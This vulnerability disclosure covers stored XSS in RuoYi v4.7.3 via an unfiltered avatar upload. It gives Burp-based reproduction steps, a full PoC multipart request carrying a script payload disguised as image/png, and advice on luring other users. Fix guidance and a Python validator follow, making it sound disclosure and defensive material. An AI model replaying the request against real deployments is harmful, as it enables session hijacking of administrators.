Description
Vulnerability disclosure
Vulnerability title: An HTML file can be uploaded through the avatar upload, and its content is not filtered, which results in stored XSS in RuoYi CMS
Product: https://github.com/yangzongzhuan/RuoYi
Affected Versions: v4.7.3 (the latest version at the time of discovery)
Discovery time: 2022.5.16
Found by: solarpeng502
Exploit scenario: The system allows multiple users to log in. A logged-in user can replace the avatar image on the profile page with an HTML file, which the application then stores and serves from its own origin. Any other user of the same RuoYi instance who opens the file's URL executes the attacker's script in the context of the application, so a single low-privileged account can attack administrators.
Analysis report:
-
If you do not read Chinese, switch the interface to English with a browser translation plugin such as Google Translate.
-
Click "modify avatar", upload a normal image, then click the OK button.


-
Intercept the request with a proxy such as Burp Suite, change the file suffix to html and replace the file content with an XSS payload such as "<script>alert(1)</script>", then forward the request. The response is {"msg":"操作成功","code":0} ("operation successful"), which means the upload succeeded: neither the suffix nor the content was checked on the server side.



-
Refresh the index page with Burp intercepting, then click the avatar again: Burp captures the request for the uploaded HTML file, which reveals the URL under which the server now serves it.


-
Copy the URL of the HTML file and send it to other users of the RuoYi instance; when they open it, the XSS payload runs in the application's origin with their session.

POC:
POST /system/user/profile/updateAvatar HTTP/1.1
Host: mysite.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------21781164112778176297556867959
Content-Length: 249
Origin: http://mysite.com/
Connection: close
Referer: http://mysite.com/system/user/profile/avatar
Cookie: Your cookies
-----------------------------21781164112778176297556867959
Content-Disposition: form-data; name="avatarfile"; filename="blob.html"
Content-Type: image/png

<script>alert(1)</script>
-----------------------------21781164112778176297556867959--
Fixes: The backend should validate the file suffix against an allowlist of image types (png, jpg, jpeg, gif, bmp) and refuse HTML uploads outright. Because the client controls both the filename and the Content-Type header (the PoC claims image/png for an HTML body), the server should also inspect the first bytes of the file for an image signature rather than trust the declared type. Trying to filter XSS payloads out of an HTML file is not a reliable alternative: browsers execute script from many constructs beyond <script> tags. As defence in depth, uploaded files should be served with X-Content-Type-Options: nosniff and a Content-Disposition: attachment header, or from a separate origin, so that a file that does slip through cannot run script in the application's origin.
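The server-side checks described above, as an added example that is not RuoYi's own code. It models an upload as (filename, bytes), ignores the client-supplied Content-Type, and includes a minimal parser for a one-part multipart body so the PoC request can be fed through the check offline. The boundary, filename and payload are taken from the PoC; the allowlist, size cap and function names are assumptions for the illustration.

```python
"""Allowlist + magic-byte validation for an avatar upload (added example,
not RuoYi's own code). The client-supplied Content-Type header is never
consulted; only the filename extension and the file bytes are checked."""
from __future__ import annotations

import os
import re

# Image types the avatar endpoint is willing to store (allowlist, not denylist).
ALLOWED_EXTENSIONS = {"png", "jpg", "jpeg", "gif", "bmp"}

# Leading bytes each allowed type must start with.
MAGIC = {
    "png": [b"\x89PNG\r\n\x1a\n"],
    "jpg": [b"\xff\xd8\xff"],
    "jpeg": [b"\xff\xd8\xff"],
    "gif": [b"GIF87a", b"GIF89a"],
    "bmp": [b"BM"],
}

MAX_AVATAR_BYTES = 2 * 1024 * 1024  # size cap; assumed value for the example


def extension_of(filename: str) -> str:
    """Lower-cased extension of the basename; path components are discarded."""
    base = os.path.basename(filename.replace("\\", "/"))
    if "." not in base:
        return ""
    return base.rpartition(".")[2].lower()


def validate_avatar(filename: str, content: bytes) -> tuple[bool, str]:
    """Return (accepted, reason) for an uploaded avatar."""
    ext = extension_of(filename)
    if ext not in ALLOWED_EXTENSIONS:
        return False, f"extension '{ext or '(none)'}' not in allowlist"
    if len(content) > MAX_AVATAR_BYTES:
        return False, "file too large"
    # A renamed HTML file (x.png) fails here even though its suffix passed.
    if not any(content.startswith(m) for m in MAGIC[ext]):
        return False, f"content does not look like a .{ext} image"
    return True, "ok"


def parse_single_part(body: bytes, boundary: str) -> dict:
    """Minimal parser for a one-part multipart/form-data body (enough for the
    PoC). Returns the part's filename, declared Content-Type and raw bytes."""
    delim = b"--" + boundary.encode()
    start = body.index(delim) + len(delim) + 2          # skip delimiter + CRLF
    end = body.index(b"\r\n" + delim + b"--", start)      # closing delimiter
    raw_headers, _, content = body[start:end].partition(b"\r\n\r\n")
    headers = {}
    for line in raw_headers.decode("latin-1").split("\r\n"):
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    m = re.search(r'filename="([^"]*)"', headers.get("content-disposition", ""))
    return {
        "filename": m.group(1) if m else "",
        "content_type": headers.get("content-type", ""),
        "content": content,
    }


# Boundary from the PoC: Firefox's 27 dashes followed by the digits shown above.
BOUNDARY = "-" * 27 + "21781164112778176297556867959"

# Constructed from the PoC request body: the part is named blob.html, claims
# image/png, and carries the HTML payload. Its length matches the PoC's
# Content-Length of 249.
POC_BODY = (
    b"--" + BOUNDARY.encode() + b"\r\n"
    b'Content-Disposition: form-data; name="avatarfile"; filename="blob.html"\r\n'
    b"Content-Type: image/png\r\n"
    b"\r\n"
    b"<script>alert(1)</script>\r\n"
    b"--" + BOUNDARY.encode() + b"--\r\n"
)

# Constructed minimal PNG header (signature + start of IHDR), used as the
# legitimate upload in the demo.
GOOD_PNG = b"\x89PNG\r\n\x1a\n" + b"\x00\x00\x00\x0dIHDR" + b"\x00" * 17


def check_poc() -> tuple[bool, str]:
    """Run the PoC request body through the validator."""
    part = parse_single_part(POC_BODY, BOUNDARY)
    return validate_avatar(part["filename"], part["content"])


if __name__ == "__main__":
    print("PoC blob.html:", check_poc())
    print("renamed x.png:", validate_avatar("x.png", b"<script>alert(1)</script>"))
    print("real avatar.png:", validate_avatar("avatar.png", GOOD_PNG))
```

The renamed-file case is the reason the magic-byte check sits beside the allowlist: a suffix check alone would accept x.png with an HTML body, and a browser that sniffs content (absent nosniff) could still render it as HTML.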

